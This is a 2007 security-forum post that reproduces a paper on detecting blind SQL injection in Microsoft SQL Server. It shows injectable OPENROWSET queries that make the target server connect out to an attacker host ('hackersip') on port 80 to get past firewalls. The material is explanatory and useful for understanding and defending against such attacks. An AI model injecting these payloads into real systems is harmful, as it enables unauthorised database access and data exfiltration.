 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 180
 Members: 0
 Total: 180
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Detection Of Sql Injection Vulnerabilities |
|
 Posted: Sun Feb 11, 2007 4:39 pm |
 |
|
| Dinosaurio |
| Regular user |
 |
|
| Joined: Aug 11, 2006 |
| Posts: 10 |
|
|
|
 |
|
 |
|
Hi,
Many developers and web administrators are complacent about SQL Injection vulnerabilities if the attacker cannot see the SQL error messages and/or cannot return the queries result directly to the browser.This topic was first addressed in a white paper written by Chris Ansley of NGSSoftware
(http://www.nextgenss.com/papers/more...injection.pdf). This paper will
expand on possible ways this threat can be used. When trying to exploit SQL Injection in an application, an attacker needs a method of determining if the SQL injected is executed on the server. As well, a method of retrieving the results is needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET and OPENDATASOURCE
functions allow a user in SQL Server to open remote data sources. These functions are used to open a connection to an OLEDB provider. The OPENROWSET function will be use in all the examples but the OPENDATASOURCE function could be used with the same results.
This statement will return all the rows of table1 on the remote data source:
select * from
OPENROWSET( 'SQLoledb',
'server=servername;uid=sa;pwd=h8ck3r',
'select * from table1' )
Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement
The connection string parameter can specify other options such as the network library to use or the IP address and port to which to connect. Below is an example.
select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=10.0.0 .10,1433;',
'select * from table' )
In this example, SQL Server will use the OLEDB provider SQLoledb to execute the SQL statement. The OLEDB provider will use the SQL Server sockets library (DBMSSOCN) to connect to port 1433 on the IP address 10.0.0.10 and will return the results of the SQL statement to the local SQL Server. The login sa and the password h8ck3r will be used to authenticate to the remote data source.
The next example demonstrates how the OPENROWSET function can be used to connect to an arbitrary IP address/port including the source IP address and port of the attacker. In this case the hacker?s host name is hackersip and a version of Microsoft SQL Server is running on port 80. ?hackersip? can be replaced with an IP address and the port can be any port the hacker would like to direct connections to.
select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80 ;',
'select * from table')
WWW.APPSECINC.COM
By injecting this SQL statement, an attacker can determine if the statement is being executed. If the SQL is successfully executed, the attacked server will issue an outbound connection attempt to the attacker?s computer on the port specified. It is also unlikely that the firewall will block this outbound SQL connection because the connection is occurring over port 80.
This technique allows the attacker to determine if injected SQL statements executed even if error messages and query results are not returned to the browser.
Enjoy reading
Good Luck
Dino
PD:
Font :Cesar Cerrudo (sqlsec@yahoo.com) |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
